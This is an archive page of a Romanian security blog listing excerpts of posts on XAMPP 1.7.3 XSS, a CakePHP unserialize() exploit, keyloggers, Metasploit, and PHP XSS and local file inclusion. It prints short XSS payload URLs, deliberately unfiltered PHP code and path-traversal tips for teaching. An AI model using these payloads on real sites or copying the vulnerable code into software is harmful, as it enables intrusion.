Arhiva | Audit securitate RSS pentru aceasta categorie
Vulnerabilitate XAMPP 1.7.3 – XSS - Securitatea Informatica

Vulnerabilitate XAMPP 1.7.3 – XSS

Data: 11/06/2010 Exploit: http://localhost/xampp/ming.php/”<script>alert(“XSS”)</script> http://localhost/xampp/iart.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/cds.php/’onmouseover=alert(“XSS”)> http://localhost/xampp/aspinfo.asp/1<script>alert(“XSS”)</script> http://localhost/xampp/adodb.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/perlinfo.pl/1<script>prompt(“XSS”)</script>

Citeşte mai mult
Vulnerabilitate CakePHP <= 1.3.5 / 1.2.8 - Securitatea Informatica

Vulnerabilitate CakePHP <= 1.3.5 / 1.2.8

Data: 20 noiembrie 2010 Descriere: Acest cod exploateaza o vulnerabilitate unserialize() in componenta de securitate a CakePHP. Mai multe detalii aici. Acest exploit functioneaza impotriva oricarei aplicatii dezvoltate pe framework-ul CakePHP care foloseste form-uri POST cu token-uri de securitate si foloseste configuratia Cache default (file-system caching). Este posibila exploatarea si pentru alte tipuri de cache [...]

Citeşte mai mult
Keyloggerele - Securitatea Informatica

Keyloggerele

Keyloggere software Aceste programe software sunt proiectate pentru a lucra pe sistemul de operare al computerului ţintă. Din punct de vedere tehnic, există cinci categorii: Nivel de hypervisor: keyloggerul se poate afla, teoretic, într-un hypervisor malware care rulează sub sistemul de operare,acesta (SO) ramanand neatins. Acesta devine efectiv o maşină virtuală. Blue Pill este un [...]

Citeşte mai mult
Metasploit - Securitatea Informatica

Metasploit

Proiectul Metasploit este un proiect open-source de securitate informatică care oferă informaţii cu privire la vulnerabilităţile de securitate şi ajutor în teste de penetrare. Cel mai bine-cunoscut sub-proiect este framework-ul Metasploit, un instrument pentru dezvoltarea şi executarea exploit-urilor pe o maşină ţintă. Alte sub-proiecte importante sunt baza de date Opcode si arhiva shellcode. Proiectul Metasploit [...]

Citeşte mai mult
Vulnerabilitati PHP – Cross-Site Scripting - Securitatea Informatica

Vulnerabilitati PHP – Cross-Site Scripting

Sfaturi : Puteţi folosii o mulţime de vectori, puteţi încerca o grămadă de metode de a trece peste protecţii, îi puteţi găsii pe internet. Exemplu de bază Cod:. <?php $name=$_GET['name']; print $name; ?> Inputul nu este filtrat, un atacator poate injecta cod JavaScript. Exemplu: http://127.0.0.1/test.php?name=<script>alert(”XSS”)</script> Un popup cu mesajul XSS va fi afişat. Codul JavaScript a [...]

Citeşte mai mult
Vulnerabilitati PHP –  Local File Inclusion - Securitatea Informatica

Vulnerabilitati PHP – Local File Inclusion

Sfaturi : Puteţi folosi trucul cu NULLBYTE şi ? ../ înseamnă un director înapoi Pe serverele Windows puteţi folosi “..\” în loc de “../”. “..\” va devenii “..%5C” (urlencoded). Aceleaşi funcţii care îţi permit să incluzi (include, include_once, require, require_once). Exemplu de bază Cod: <?php $pagina=$_GET['pagina']; include ’/pages/’.$pagina; ?> Acum, nu putem să includem scriptul nostru [...]

Citeşte mai mult
Pagina 3 din 712345...Ultima »
This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro